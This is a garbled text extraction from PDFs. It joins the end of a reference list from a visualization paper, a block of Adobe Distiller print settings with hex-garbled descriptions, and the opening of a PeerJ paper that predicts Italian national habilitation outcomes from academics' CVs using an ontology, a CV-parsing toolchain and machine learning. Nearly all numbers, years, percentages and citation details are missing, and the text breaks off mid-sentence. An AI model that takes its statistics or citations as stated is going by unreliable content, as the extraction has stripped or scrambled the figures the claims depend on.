proceedings of ieee pacific visualization symposium , pacificvis . – . tikhonova a, correa cd, ma kl. b. visualization by proxy: a novel framework for deferred interaction with volume data. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . wald i, johnson gp, amstutz j, brownlee c, knoll a, jeffers j, günther j, navratil p. . ospray—a cpu ray tracing framework for scientific visualization. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . wald i, woop s, benthin c, johnson gs, ernst m. . embree: a kernel framework for efficient cpu ray tracing. acm transactions on graphics ( ): doi . / . . wang d, luo x, yuan f, podhorszki n. . a data analysis framework for earth system simulation within an in-situ infrastructure. journal of computer and communications ( ): – doi . /jcc. . . wetherbee t, jones e, knox m, sandalski s, woodward p. . in-core volume rendering for cartesian grid fluid dynamics simulations. in: xsede conference on scientific advancements enabled by enhanced cyberinfrastructure. – . whitlock b, favre mj, meredith sj. . parallel in situ coupling of simulation with a fully featured visualization system. in: eurographics symposium on parallel graphics and visualization. – . ye y, miller r, ma k-l. . in situ pathtube visualization with explorable images. in: egpgv ' : proceedings of the th eurographics symposium on parallel graphics and visualization. – . yu h, wang c, grout rw, chen jh, ma kl. . in situ visualization for large-scale combustion simulations. ieee computer graphics and applications ( ): – . zhang p, liao x, zhang k. . patterns in spherical rayleigh-bénard convection: a giant spiral roll and its dislocations. physical review e ( ): . kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /annurev.fl. . . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . / . http://dx.doi.org/ . /jcc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ d street view: a video-based visualization method introduction recording stage of d street view test simulations d street viewer interactive analysis of the test simulations with d street view discussion conclusions flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted february accepted may published june corresponding author francesco poggi, fpoggi@cs.unibo.it, francesco.poggi @unibo.it academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright poggi et al. distributed under creative commons cc-by . open access predicting the results of evaluation procedures of academics francesco poggi , paolo ciancarini , , aldo gangemi , andrea giovanni nuzzolese , silvio peroni and valentina presutti department of computer science and engineering (disi), university of bologna, bologna, italy institute of data science and artificial intelligence, innopolis university, innopolis, russia department of classical philology and italian studies, university of bologna, bologna, italy stlab, institute of cognitive science and technologies, national research council, roma, italy abstract background. the reform of the italian university system introduced the national scientific habilitation (asn) as a requirement for applying to permanent professor positions. since the cvs of the , candidates and the results of their assessments have been made publicly available, the asn constitutes an opportunity to perform analyses about a nation-wide evaluation process. objective. the main goals of this paper are: (i) predicting the asn results using the information contained in the candidates’ cvs; (ii) identifying a small set of quantitative indicators that can be used to perform accurate predictions. approach. semantic technologies are used to extract, systematize and enrich the information contained in the applicants’ cvs, and machine learning methods are used to predict the asn results and to identify a subset of relevant predictors. results. for predicting the success in the role of associate professor, our best models using all and the top predictors make accurate predictions (f-measure values higher than . ) in % and . % of the cases, respectively. similar results have been achieved for the role of full professor. evaluation. the proposed approach outperforms the other models developed to predict the results of researchers’ evaluation procedures. conclusions. such results allow the development of an automated system for support- ing both candidates and committees in the future asn sessions and other scholars’ evaluation procedures. subjects data science, digital libraries keywords predictive models, scientometrics, research evaluation, data processing, asn, machine learning, national scientific habilitation, academic assessment, science of science, informetrics introduction quantitative indicators have been extensively used for evaluating scientific performances of a given research body. international institutions, national authorities, research and funding bodies have an increasing interest on indicators, mainly based on bibliometric data, which can be used to algorithmically assess the performance of their institutions. scimago (https://www.scimagojr.com/) (for journals), the performance ranking of scientific papers for world universities (http://nturanking.lis.ntu.edu.tw/) and the academic ranking of how to cite this article poggi f, ciancarini p, gangemi a, nuzzolese ag, peroni s, presutti v. . predicting the results of evaluation procedures of academics. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:fpoggi@cs.unibo.it mailto:francesco.poggi @unibo.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://www.scimagojr.com/ http://nturanking.lis.ntu.edu.tw/ http://doi.org/ . /peerj-cs. world universities (http://www.shanghairanking.com/) (for universities) are popular examples of rankings that use bibliometric indicators to rate scientific performances. peer review is still the holy grail for research evaluation, but the pressure for more frequent and extensive assessments of the performance of researchers, research groups and institutions makes bibliometry attractive. currently, several countries use a combination of peer review and bibliometric indicators to allocate funding and evaluate the performance of higher education institutions. examples of this mixed strategy are the excellence in research for australia (era) and the valutazione della qualità della ricerca (vqr) in italy. the british research excellence framework (ref), successor of the research assessment exercise (rae), is another example, in which experts can make use of citation data as an additional input of their reviews. in many countries, bibliometric indicators are one of the factors that can be used for assessing individuals or institutions to allocate funding at a national level. for instance, in germany the impact factor of the publications is used in performance-based funding systems, in finland, the reallocation system uses the number of publications as one of the considered measures, in norway, a two-level bibliometric indicator is used for similar purposes, etc. (vieira, cabral & gomes, a). the growing importance of quantitative indicators may be mainly explained by their advantages compared to peer review processes: objectivity, low time and implementation costs, possibility of quick and cheap updates, ability to cover a large number of individuals, etc. however, in many cases peer review is still the only method available in practice, and is hence intensively used in many situations. we know that bibliometric indicators are more accepted in the assessment of large research bodies, but they are still used frequently for individuals. it is, therefore, very important to benchmark bibliometric indicators against traditional peer assessments in real situations. some studies have been carried out in recent years with the main goal of finding a relation between the two methods at several levels. at national level, the relation between bibliometric indicators and the results of the research assessment exercise (rae) in britain (norris & oppenheim, ; taylor, ) or the italian triennial assessment exercise (vtr) (abramo, d’angelo & caprasecca, ; franceschet & costantini, ) have been investigated. other studies focused on the assessments of departments (aksnes, ) and research groups (van raan, ). just a few works have been made at the individual level (nederhof & van raan, ; bornmann & daniel, ; bornmann, wallon & ledin, ), while many analyzed the correlation between indicators and research performances (leydesdorff, ; franceschet, ). recent works analyzed the correlation between traditional bibliometric indicators and altmetrics by also taking into account quality assessment procedures performed by peers (nuzzolese et al., ; wouters et al., ; bornmann & haunschild, ). all these works share the general finding that a positive and significant correlation exists between peer review and bibliometric indicators, and suggest that indicators can be useful tools to support peer reviews. in this work, we investigate the relation between quantitative indicators and peer review processes from a different perspective. the focus of the study is to analyze if and to what extent quantitative indicators can be used to predict the results of peer reviews. this problem is interesting for many different reasons. first of all, since a high number of poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.shanghairanking.com/ http://dx.doi.org/ . /peerj-cs. the acronym asn stands for abilitazione scientifica nazionale. for the rest of the paper, all acronyms (e.g., asn, miur, anvur, etc.) are based on the original italian names, since they are well established in the italian scientific community. the english translations are also provided for the benefit of the international readers. factors are involved in peer review processes (e.g., cultural, social, contextual, scientific, etc.), the feasibility of reproducing such a complex human process through computational and automatic methods is a relevant topic per se. moreover, the possibility of predicting human assessments has many practical applications. having an idea of the results of an evaluation procedure may be very useful for candidates (e.g., to understand if they are competitive for a given position, to decide to apply or not, etc.). also, evaluators can benefit from such information (e.g., for supporting a first screening of the candidates, for spotting possible errors to investigate, etc.). in other words, the final goal of our work is not substituting peer committees with automatic agents, but providing tools for supporting both candidates and evaluators in their tasks. this study analyzes the italian national scientific habilitation (asn ), a nation-wide research assessment procedure involving a large number of applicants from all academic areas. the asn is one of the main novelties in the national university system introduced by law / (law, ), and it is similar to other habilitation procedures already in place in other countries (e.g., france and germany) in that it is a prerequisite for becoming a university professor. the asn is meant to attest that an individual has reached the scientific maturity required for applying for a specific role (associate or full professor) in a given scientific discipline; however, the qualification does not guarantee that a professorship position will eventually be granted. the assessments of the candidates of each discipline are performed by committees composed of four full professors from italian universities and one professor from a foreign research institution. the evaluation is performed considering the cvs submitted by the applicants and three quantitative indicators computed for each candidate. the first session of the asn started on november and received , applications spanning recruitment fields (rfs), which correspond to scientific fields of study in which scientific areas (sas) are organized. the curricula of all applicants, the values of their bibliometric indicators and the final reports of examination committees have been made publicly available. this work focuses on the analysis of applicants’ curricula. for this purpose, we processed this vast text corpus, extracted the contained information and used it to populate a knowledge graph by exploiting semantic technologies. this knowledge graph contains a collection of relevant data for each applicant and it has then been used to perform different kinds of analyses at the level of category of discipline (i.e., bibliometric and non-bibliometric), sa, and rf. an approach based on machine learning techniques has been used to answer the following research questions: • rq : is it possible to predict the results of the asn using only the information contained in the candidates’ cvs? • rq : is it possible to identify a small set of predictors that can be used to predict the asn results? the rest of the work is organized as follows. ‘related work’ presents an overview of the related work. ‘methods and material’ provides necessary background information about the asn, gives an overview of the asn dataset, and describes the algorithms used in this poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of the related work with our study. missing data are labeled with ‘‘n.a.’’. poc stands for ‘‘prediction of citations’’, aoh for ‘‘analysis of h-index for peer judgements’’, and popj for ‘‘prediction of peer judgements’’. work papers authors discipline predictors task method ibáñez et al. (jasist, ) n.a. computer science poc gaussian bayesian net- works danell (jasist, ) , , neuroscience and physics poc quantile regression fu & aliferis (scientometrics, ) , n.a. medicine (+ textual features) poc support vector ma- chines lindahl (j. of informetrics, ) n.a. mathematics poc logistic regression bornmann & daniel (j. of informetrics, ) n.a. biomedicine aoh correlation analysis van raan (scientometrics, ) n.a. chemistry aoh correlation and error analysis cronin & meho (jasist, ) n.a. information science aoh correlation analysis vieira, cabral & gomes (jasist, a) , hard sciences (based on bibl. indices) popj rank ordered logistic regression jensen, rouquier & croissant (scientometrics, ) n.a. , all popj binomial regression tregellas et al. (peerj, ) n.a. biomedicine ( for the best model) popj logistic regression, support vector ma- chines this work , , , all popj support vector ma- chines (cfs for feature selection) work. in ‘results’ we describe the results of the analyses performed to answer the two aforementioned research questions, and we evaluate our work by comparing the predictive power of our approach with others at the state of the art. finally, in the last two sections we discuss the results and draw some conclusions. related work quantitative indicators have been extensively used for evaluating the scientific performance of a given research body. many recent studies have focused on the predictive power of such indicators for different purposes. these works can be divided into two main groups: those that use bibliometric indicators to predict other indicators and those that use bibliometric indicators to predict the results of evaluation procedures performed through a peer review process or a mixed strategy (i.e., a combination of peer review and bibliometric indicators). we discuss the main recent works on this topic. to facilitate the readers, table summarizes the main information about them and our study. a first challenge concerns the problem of identifying a subset of bibliometric indicators for predicting other bibliometric indices. ibáñez et al. ( ) introduced an approach based on gaussian bayesian networks to identify the best subset of predictive variables. the poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. approach has been tested on the data of spanish full professors of computer science using bibliometric indicators. the main drawback of the work is that no evaluation is presented: only a test on a small sample composed of three cases is discussed in the paper. other works focused on the prediction of papers citations. danell ( ) used previous publication volume and citation rate of authors to predict the impact of their articles. the aim of this work is to investigate whether evaluations systems based on researchers’ track records actually reward excellence. the study focused on two disciplines (i.e., episodic memory research and bose–einstein condensate) and developed a quantile regression model based on previous publication volume and citation rate to predict authors’ relative citation rate. another work (fu & aliferis, ) faces the problem of predicting the number of citations that a paper will receive using only the information available at publication time. the used model is based on support vector machines, and has been tested on a mixture of bibliometric features and content-based features extracted from biomedical articles. a recent work (lindahl, ) investigates the ability of four indices to predict whether an author will attain excellence—operationalized by the indicator defined in (bornmann, )—in the following four years. the developed model is based on logistic regression and has been tested on a dataset composed of the track records of mathematicians. only a few works focused on the problem of using bibliometric indicators to predict the results of evaluation procedures performed through peer-review processes. vieira, cabral & gomes ( a) compare three models for predicting the success of applicants to academic positions. the test dataset is composed of the track records of candidates to selection processes for associate and full professor in hard sciences that took place in portugal between and . the areas of chemistry, physics, biology, mathematics, mechanics, geology, and computer science were considered. in all cases, candidates have been assessed by a panel of peers, producing a ranking of the applicants. starting from bibliometric indicators (i.e., number of documents, percentage of cited, highly cited and citing documents, average number of authors, hnf -index, nir, snip, sjr, percentage of international collaborations, normalized impact and the number of scimago’s q journals) a few composite indices have been derived through a factor analysis. following a discrete choice model, three predictive models based on rank ordered logistic regression (rolr) have been defined. the best model is able to predict the applicants placed in the first position by peers in % of the cases. by considering the problem of predicting the relative position of two candidates (i.e., who will be ranked in the higher position), the best model is able to predict % of the orderings. in another work (vieira, cabral & gomes, b), the performances of these models have been compared with a random model, observing that in % of the cases the applicant placed in first position by peers has a probability of being placed first that is better than chance. the authors conclude that the predictions provided by the models are satisfactory, and suggest that they can be used as an auxiliary instrument to support peer judgments. another work tested the predictive power of eight indicators for predicting scientists promotions (jensen, rouquier & croissant, ). the dataset used in the study is composed of the track records of , cnrs researchers from all disciplines that have filled the cnrs report between and , whose data has been obtained by querying the web of science poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. database. in the same timespan, the promotions of about cnrs researchers at all the five cnrs levels have been considered. a binomial regression model (logit) has been used to assess the overall relevance of eight quantitative indicators (h-index, normalized h-index, number of publications and citations, mean citations per paper, h-index per paper, age, gender) and to study their dependence. the results showed that the h-index is the best index for predicting the promotions, followed by the number of publications. differences exist between disciplines: in engineering, for instance, the number of publications is the best predictor. a logit model based on the best overall predictor (i.e., h-index) has been tested for each subdiscipline, leading to correct predictions in % of the cases. the authors conclude that bibliometric indicators do much better than randomness, which would achieve % of guessed promotions. a recent study (tregellas et al., ) focused on the problem of predicting career outcomes of academics using the information in their publication records. the objective of the work is to identify the main factors that may predict the success of young researchers in obtaining tenure-track faculty research positions. the dataset used in this study is composed of the track records of phd graduates from biomedical sciences programs at the university of colorado from to . the ratio of faculty/non-faculty members (i.e., individuals employed/not employed in faculty positions) is %. for each phd graduate, indicators has been computed (i.e., sex, date of graduation, number of first-author and non-first-author publications , average impact factor of first-author and non-first-author publications, highest impact factor of first-author and non-first-author publications, weighted first-author and non-first-author publication count). logistic regression models and support vector machines has been used to investigate and compare the ability of the aforementioned indicators to predict career outcomes. the best prediction has been performed by the logistic regression model using three predictors (i.e., sex, date of graduation, and weighted first-author publication count), showing % accuracy . a similar result (i.e., % accuracy) has been obtained by the best model based on support vector machines using the same predictors. the results suggest that, while sex and months since graduation also predict career outcomes, a strong predoctoral first-author publication record may increase the likelihood of obtaining an academic faculty research position. the analysis of the results also showed for all models high negative predictive values (i.e., high accuracy in predicting those who will not obtain a faculty position), while low positive predictive values. this suggests that first-author publications are necessary but not sufficient for obtaining a faculty position. the main limitation of the study concerns the dataset size, since it was conducted on a small set of individuals at only one institution, focusing on a single discipline. the authors observe that it is then necessary to determine how generalizable the current findings are. finally, the fact that all the best models are less than % accurate suggests that variables other than those considered here are also likely to be important factors in predicting future faculty status. other empirical studies focused on a single indicator (i.e., the h-index) to assess how it correlates with peer judgements. these works have the main limitation of being carried out on small samples for technical reasons (i.e., the difficulty of obtaining large sets of robust bibliometric data). in practice, they were generally limited to a single discipline: bornmann poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. & daniel ( ) studied applications to long-term fellowships in biomedicine, van raan ( ) analyzed the evaluation of about researchers in chemistry, cronin & meho ( ) studied influential information scientists from the us. to the best of our knowledge, no other work analyzed the predictive power of quantitative indicators for predicting the results of peer judgments of researchers. methods and material this section provides necessary background information about the asn and describes the asn dataset, the techniques used to analyze this text corpus, and the ontology developed for storing data in a semantic format. a description of the classification and feature selection algorithms used in the analyses presented in ‘‘results’’ concludes the section. data from the italian scientific habilitation background the italian law / (law, ) introduced substantial changes in the national university system. before , in the italian universities there were three types of tenured positions: assistant professor, associate professor and full professor. the reform suppressed the position of assistant professor and replaced it with two types of fixed term positions called type a and type b researcher. type a positions last for three years and can be extended for other two years. type b positions last for three years and have been conceived as a step for becoming tenured associate professor, since at the time of recruitment universities must allocate resources and funding for the promotion. each academic is bound to a specific recruitment field (rf), which corresponds to a scientific field of study. rfs are organized in groups, which are in turn sorted into scientific areas (sas). in this taxonomy defined by decree (ministerial decree , ), each of the rfs is identified by an alphanumeric code in the form aa/gf, where aa is the id of the sa (in the range - ), g is a single letter identifying the group of rfs, and f is a digit denoting the rf. for example, the code of the rf ‘‘neurology’’ is /d , which belongs to the group ‘‘specialized clinical medicine’’ ( /d), which is part of the sa ‘‘medicine’’ ( ). the sas are listed in table , and the rfs are listed in (poggi et al., b). under the new law, only people that attained the national scientific habilitation (asn) can apply for tenured positions in the italian university system. it is important to note that an habilitation does not guarantee any position by itself. the asn has indeed been conceived to attest the scientific maturity of researchers and is a requirement for accessing to a professorship in a given rf. each university is responsible for creating new positions for a given rf and professional level provided that financial and administrative requirements are met, and handles the hiring process following local regulations and guidelines. the first two sessions of the asn took place in and . although the law / prescribes that the asn must be held at least once a year, the next sessions took place in ( session), ( sessions) and ( sessions). at the time of the writing of this article, the last session of the asn was still in progress, and the dates of the next sessions have not yet been set. for each of the rfs, the ministry of university and research (miur) appoints an examination committee for the evaluation of poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the italian scientific areas. for each we report the numeric id, a three-letter code, the name of the area and the number of rfs it contains. id code area name n. of recr. fields mcs mathematics and computer sciences phy physics che chemistry eas earth sciences bio biology med medical sciences avm agricultural sciences and veterinary medicine cea civil engineering and architecture iie industrial and information engineering apl antiquities, philology, literary studies, art history hpp history, philosophy, pedagogy and psychology law law ecs economics and statistics pss political and social sciences total the candidates. the committees are composed of five full professors who are responsible for the evaluation of the applicants for associate and full professor. committee members are randomly selected from a list of eligible professors, for a total of professors. different committees have been appointed for , and - sessions, respectively. in order to apply to a session of the asn, candidates have to submit a curriculum vitae with detailed information about their research activities. although the asn is bound to a specific rf and professional level, it is possible to apply in different rfs and roles. in , for example, / ( . %) applicants for full professor in the rf /h (information processing systems) also applied to /b (informatics). those who fail to get an habilitation cannot apply again to the same rf and level in the next session. once acquired, an habilitation lasts for six years. the asn introduced two types of parameters called bibliometric and non-bibliometric indicators, respectively. bibliometric indicators apply to scientific disciplines for which reliable citation databases exist. the three bibliometric indicators are: • normalized number of journal papers • total number of citations received • normalized h-index. since citations and paper count increase over time, normalization based on the scientific age (the number of years since the first publication) is used to compute most of the indicators. the aforementioned indicators are used for all rfs belonging to the first nine sas ( - ), with the exception of the rfs /c , /d , /e , /e , /f and the four rfs belonging to the group psichology ( /e). these rfs are collectively denoted as bibliometric disciplines. poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the number of applications for associate and full professor for each session of the asn. session associate professor full professor total , , , , , , , , , a , , , b , , , a , , , total , , , non-bibliometric indicators apply for the rfs for which miur assessed that citation databases are not ‘‘sufficiently complete’’, and hence bibliometric indices can not be reliably computed. the three non-bibliometric indicators are: • normalized number of published books • normalized number of book chapters and journal papers • normalized number of paper published on ‘‘top’’ journals. these are used for all rfs belonging to the last five sas ( – ) with the exceptions described above. these rfs are denoted as non-bibliometric disciplines. it is important to remark that this terminology (i.e., ‘‘bibliometric’’ and ‘‘non-bibliometric’’) is used in the official miur documents but it is not consistent with that used by the scientometric community. non-bibliometric indicators, for instance, are indeed bibliometric being based on paper counts. given that these terms became standard within the italian research community, we will follow the miur ‘‘newspeak’’ according to the definitions above. the values of the indicators for each candidate were computed by the national agency for the assessment of universities and research (anvur), a public agency established with the objective of assessing italian academic research. data from scopus and web of science were used for this computation, and only publications in a time window of ten years before the asn session were considered. the computed indicators and the candidates’ cvs are the only information provided to the evaluation committees for their assessments. the sessions of the asn have been analyzed by a quantitative point of view in marzolla ( ), peroni et al. ( ) and di iorio, peroni & poggi ( ). asn data the number of applications submitted to the six sessions of the asn are reported in table . we focused on the session of the asn because: (i) it is a representative sample of the whole population asking for habilitation (this session was the first and received the more than half of the overall submissions across all years of asn); (ii) since in different people were appointed in the committees, in this way we exclude biases and other problems introduced by changes in the evaluation committees. overall, the session of the asn received , applications spanning rfs. for each application, we collected three different documents: the cv, the official document poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. with the values of the three quantitative indicators described in the previous section and the final reports of the examination committee. these documents are in pdf, and have been made publicly available on the anvur site for a short period of time. some basic information and statistics about the asn session are summarized in (poggi et al., b). since anvur did not provide a template for the habilitation, the cvs are very heterogeneous, varying in terms of formatting, internal structure and organization. this heterogeneity and the massive amount of information contained in the , pdfs are two of the main challenges faced in this work. in order to manage this problem, we developed an ontology which provides an uniform representation of the information and a reference conceptual model. it is the basis of both the data processing and subsequent analyses, as described in the following sections. ontology description the objective of the academic career (ac) ontology is to model the academic career of scholars. ac is an owl (w c, ) ontology composed of fifteen modules, each of which is responsible for representing a particular aspect of the scientific career of a scholar. the first two modules of the ac ontology concern personal information and publications. the next modules pertain to ten categories suggested by anvur: . participation to scientific events with specific roles (eg. speaker, organizer, attendee, etc.) . involvement and roles in research groups (management, membership, etc.) . responsibility for studies and researches granted by qualified institutions . scientific responsibility for research projects . direction or participation to editorial committees . academic and professional roles . teaching or research assignments (fellowships) at qualified institutes . prizes and awards for scientific activities . results of technological transfer activities (e.g., spin-offs, patents, etc.) . other working and research experiences the last three modules concern scholars’ education, scientific qualifications, and personal skills and expertise. data processing the processing of a vast set of documents such as the corpus of the asn curricula is not a trivial task. the main issue to face in this process is the management and harmonization of its heterogeneity in terms of kinds of information, structures (e.g., tables, lists, free text), styles, languages, just to cite a few. nonetheless, the automatic extraction of information from cvs and its systematization in a machine processable format is a fundamental step for this work, since all the analyses described in ‘‘results’’ are based on these data. for this purpose, we developed pdf to academic career ontology (paco), a software tool that is able to process the researchers’ cvs, extract the most relevant information, and produce a knowledge graph that conforms to the ac ontology. the processing performed poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure an overview of the paco toolchain composed of four sub-modules (circles). artifacts (i.e., inputs/outputs of the sub-modules) are depicted as rectangles. full-size doi: . /peerjcs. /fig- by paco is composed of four consecutive steps, that correspond to the software modules constituting paco’s architecture, as shown in fig. . the processing of an applicant’s cv can be summarized as follows: • html conversion: the pdf html converter takes as input a pdf and produces as output an html version of the cv composed of inline elements and presentational elements. the structure of the document is not reconstructed in this phase. in particular, the containment relations between elements (e.g., cells in a table, items in a list, etc.) are missing. for instance, a table is converted into a series of rectangles with borders (the cells) followed by a series of inline elements (the text). all the elements are at the same level in the output document hierarchy, and no explicit relation between them is maintained. • structure re-construction: the structure builder uses the presentational information computed in the previous phase to infer the structure of the document. different strategies have been developed to recognize meaningful patterns in the presentation and reconstruct the document hierarchy. for example, a mark positioned near an inline element containing text is interpreted as a list item, a sequence of consecutive list items is interpreted as a list. the output is an xml document, in which the original textual content is organized in meaningful structural elements. • semantic analysis: the objective of the semantic analyzer is to annotate the output of the previous phase with information about its content. for example, it has to infer if a list is a list of publications, awards, projects, etc. a series of analyses is performed for each element, from simple ones (e.g., to test if an element contains a name, surname, birth date, etc.) implemented through basic techniques such as the use of heuristics or pattern matching, to more complex ones (e.g., to identify publications, roles, etc.) implemented using external tools and libraries. another important technique is to leverage the homogeneity of structured elements (e.g., of all the items in a list or all the cells of a column) to infer meaningful information about their content, using the approach described in (poggi, cigna & nuzzolese, ). the basic idea is that, for instance, if the majority of the elements of a list have been recognized as publications, it is then reasonable to conclude that also the others are publications. the output of this phase is an xml document annotated with the results of the semantic analysis. • triplification: the triplifier is responsible for populating a knowledge graph with the information inferred in the previous phase. the marked xml document is the input of this stage, and the output is a knowledge graph that conforms to the ac ontology. poggi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. http://cercauniversita.cineca.it/ is a miur service that provides information and statics about italian professors, universities, degree programs, students, fundings, etc. taking stock: external engagement by academics (taste) is an european project founded under the fp program that developed a database with data about the relation between universities and enterprises in italy—see https: //eventi.unibo.it/taste. semantic scout is a service that provides cnr scientific and administrative data in a semantic format—see http://stlab.istc.cnr. it/stlab/project/semantic-scout/. the data extracted from the applicants’ cvs by paco have also been semantically enriched with information from the following external sources: • cercauniversita : for information about the candidates’ careers within the italian university system; • taste database : for data about reserchers’ entrepreneurship and industrial activities from the taste database; • semantic scout : for information about researchers of the italian 